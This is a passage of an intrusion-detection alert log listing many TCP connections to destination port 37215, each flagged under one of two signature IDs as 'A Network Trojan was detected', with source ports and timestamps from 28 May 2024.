            SID:2829579
            Source Port:34042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665719
            SID:2829579
            Source Port:57232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412665
            SID:2829579
            Source Port:41936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.018684
            SID:2835222
            Source Port:51720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.942068
            SID:2829579
            Source Port:55540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.431247
            SID:2829579
            Source Port:48210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.941738
            SID:2835222
            Source Port:50772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057695
            SID:2835222
            Source Port:47616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.966878
            SID:2829579
            Source Port:60618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.766426
            SID:2835222
            Source Port:47758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.926151
            SID:2829579
            Source Port:36664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967617
            SID:2829579
            Source Port:59392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.893347
            SID:2829579
            Source Port:52690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739451
            SID:2829579
            Source Port:48570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.487734
            SID:2829579
            Source Port:48022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048770
            SID:2829579
            Source Port:53116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.780633
            SID:2835222
            Source Port:39152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.862142
            SID:2829579
            Source Port:50230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852231
            SID:2835222
            Source Port:45188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067671
            SID:2835222
            Source Port:46122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.003007
            SID:2829579
            Source Port:37842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277085
            SID:2835222
            Source Port:37630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.760088
            SID:2835222
            Source Port:54498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304275
            SID:2835222
            Source Port:32932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542106
            SID:2829579
            Source Port:47988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996394
            SID:2829579
            Source Port:42200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.320994
            SID:2829579
            Source Port:44788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669833
            SID:2835222
            Source Port:44012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.348784
            SID:2829579
            Source Port:59054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.589866
            SID:2835222
            Source Port:56398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.881313
            SID:2835222
            Source Port:55980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.780597
            SID:2835222
            Source Port:60732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.065773
            SID:2835222
            Source Port:54062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.699652
            SID:2829579
            Source Port:50566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912041
            SID:2835222
            Source Port:43078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432569
            SID:2835222
            Source Port:44730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852992
            SID:2829579
            Source Port:37630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.736148
            SID:2829579
            Source Port:49492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.453888
            SID:2829579
            Source Port:43992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432763
            SID:2835222
            Source Port:48210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.803910
            SID:2835222
            Source Port:50856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826103
            SID:2835222
            Source Port:35870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.944929
            SID:2835222
            Source Port:40098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.043009
            SID:2835222
            Source Port:42760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899698
            SID:2835222
            Source Port:49424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713468
            SID:2835222
            Source Port:43306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.966699
            SID:2829579
            Source Port:32824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.309549
            SID:2835222
            Source Port:56270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040270
            SID:2835222
            Source Port:45994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713299
            SID:2829579
            Source Port:58518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905872
            SID:2829579
            Source Port:35502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773896
            SID:2835222
            Source Port:46532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790573
            SID:2829579
            Source Port:44168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929290
            SID:2829579
            Source Port:56598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.881906
            SID:2835222
            Source Port:59618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055903
            SID:2829579
            Source Port:49094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934894
            SID:2835222
            Source Port:53066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770921
            SID:2829579
            Source Port:59862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.423427
            SID:2835222
            Source Port:41320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929556
            SID:2829579
            Source Port:49024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850240
            SID:2835222
            Source Port:51652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001032
            SID:2829579
            Source Port:59326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989022
            SID:2835222
            Source Port:42216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.557575
            SID:2835222
            Source Port:60048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.641096
            SID:2835222
            Source Port:49498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746476
            SID:2829579
            Source Port:40998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542619
            SID:2829579
            Source Port:37590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.748179
            SID:2835222
            Source Port:34706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031409
            SID:2835222
            Source Port:38848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951344
            SID:2829579
            Source Port:34350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.617893
            SID:2829579
            Source Port:52956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068553
            SID:2835222
            Source Port:59050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.999510
            SID:2829579
            Source Port:59906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770661
            SID:2829579
            Source Port:38276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.664257
            SID:2835222
            Source Port:59696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995888
            SID:2829579
            Source Port:59080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870447
            SID:2829579
            Source Port:54000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931781
            SID:2829579
            Source Port:34116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334310
            SID:2835222
            Source Port:34856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885534
            SID:2829579
            Source Port:39378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852198
            SID:2829579
            Source Port:52662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.578453
            SID:2835222
            Source Port:52772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818428
            SID:2829579
            Source Port:35978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.822065
            SID:2829579
            Source Port:41864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887674
            SID:2829579
            Source Port:32786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.668999
            SID:2829579
            Source Port:39054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.115893
            SID:2829579
            Source Port:33208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.769395
            SID:2829579
            Source Port:39662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.814410
            SID:2835222
            Source Port:56914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.026361
            SID:2835222
            Source Port:35674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910046
            SID:2829579
            Source Port:39750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.152918
            SID:2835222
            Source Port:54842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863506
            SID:2835222
            Source Port:54758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.522955
            SID:2829579
            Source Port:58520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963545
            SID:2835222
            Source Port:56758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811324
            SID:2829579
            Source Port:38256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887409
            SID:2829579
            Source Port:51118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423199
            SID:2835222
            Source Port:32784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.916695
            SID:2835222
            Source Port:38612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.717910
            SID:2829579
            Source Port:40752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.227046
            SID:2829579
            Source Port:48584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.506233
            SID:2829579
            Source Port:45640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.851957
            SID:2835222
            Source Port:47882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.938142
            SID:2835222
            Source Port:47870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.922694
            SID:2829579
            Source Port:52160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.471786
            SID:2835222
            Source Port:59684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412764
            SID:2829579
            Source Port:38322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.999785
            SID:2829579
            Source Port:35292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.322575
            SID:2829579
            Source Port:50734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707562
            SID:2835222
            Source Port:35968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604926
            SID:2835222
            Source Port:57722
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.646289
            SID:2835222
            Source Port:33242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767526
            SID:2835222
            Source Port:37692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777568
            SID:2835222
            Source Port:39614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.063563
            SID:2835222
            Source Port:52520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862213
            SID:2835222
            Source Port:47834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.917705
            SID:2829579
            Source Port:59582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058292
            SID:2829579
            Source Port:46212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936963
            SID:2835222
            Source Port:35302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969560
            SID:2835222
            Source Port:51078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507448
            SID:2835222
            Source Port:41850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951325
            SID:2829579
            Source Port:59808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067321
            SID:2835222
            Source Port:58246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909596
            SID:2829579
            Source Port:40118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.457494
            SID:2829579
            Source Port:35712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.158751
            SID:2829579
            Source Port:38476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.062196
            SID:2829579
            Source Port:37222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968318
            SID:2835222
            Source Port:58436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.998511
            SID:2835222
            Source Port:60862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.705937
            SID:2835222
            Source Port:33240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809805
            SID:2835222
            Source Port:39430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931071
            SID:2829579
            Source Port:50970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873154
            SID:2835222
            Source Port:60936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766651
            SID:2829579
            Source Port:33034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298478
            SID:2829579
            Source Port:56596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870746
            SID:2829579
            Source Port:51302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061034
            SID:2835222
            Source Port:52800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955948
            SID:2829579
            Source Port:34946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857486
            SID:2835222
            Source Port:60800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979606
            SID:2829579
            Source Port:43354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231016
            SID:2829579
            Source Port:48514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.572571
            SID:2829579
            Source Port:56210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988707
            SID:2829579
            Source Port:57272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344875
            SID:2829579
            Source Port:58068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914913
            SID:2835222
            Source Port:57794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943521
            SID:2835222
            Source Port:59036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.152981
            SID:2829579
            Source Port:53678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459798
            SID:2829579
            Source Port:38794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900935
            SID:2829579
            Source Port:40538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.749398
            SID:2835222
            Source Port:42996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.065510
            SID:2829579
            Source Port:59140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996128
            SID:2829579
            Source Port:37432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.999386
            SID:2829579
            Source Port:33088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424154
            SID:2835222
            Source Port:51552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058158
            SID:2829579
            Source Port:34998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.822947
            SID:2829579
            Source Port:35912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767412
            SID:2835222
            Source Port:57146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.740289
            SID:2829579
            Source Port:36366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952630
            SID:2835222
            Source Port:41892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067248
            SID:2835222
            Source Port:34016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644221
            SID:2835222
            Source Port:55578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.745607
            SID:2835222
            Source Port:42760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.483972
            SID:2829579
            Source Port:57838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.666730
            SID:2829579
            Source Port:34882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825921
            SID:2829579
            Source Port:49948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.792529
            SID:2829579
            Source Port:45266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919829
            SID:2829579
            Source Port:48486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.741637
            SID:2829579
            Source Port:54552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790556
            SID:2835222
            Source Port:51732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.908890
            SID:2835222
            Source Port:44384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040344
            SID:2835222
            Source Port:36874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923868
            SID:2835222
            Source Port:54976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748568
            SID:2835222
            Source Port:44874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.746725
            SID:2829579
            Source Port:44844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.816102
            SID:2835222
            Source Port:39614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654711
            SID:2835222
            Source Port:38184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895582
            SID:2835222
            Source Port:49834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.495126
            SID:2835222
            Source Port:47796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.549953
            SID:2835222
            Source Port:43796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059689
            SID:2835222
            Source Port:34144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290718
            SID:2835222
            Source Port:48248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.804346
            SID:2829579
            Source Port:38208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.847308
            SID:2835222
            Source Port:45922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909530
            SID:2829579
            Source Port:59128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930165
            SID:2835222
            Source Port:33380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.078505
            SID:2835222
            Source Port:38016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.771739
            SID:2835222
            Source Port:41262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808087
            SID:2829579
            Source Port:57834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.858340
            SID:2835222
            Source Port:40722
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735435
            SID:2835222
            Source Port:60238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.392701
            SID:2829579
            Source Port:35352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834368
            SID:2829579
            Source Port:51336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.774158
            SID:2835222
            Source Port:59226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952623
            SID:2835222
            Source Port:54332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899847
            SID:2829579
            Source Port:56044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737210
            SID:2829579
            Source Port:47816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533371
            SID:2829579
            Source Port:45686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.675593
            SID:2835222
            Source Port:60624
            Destination Port:37215
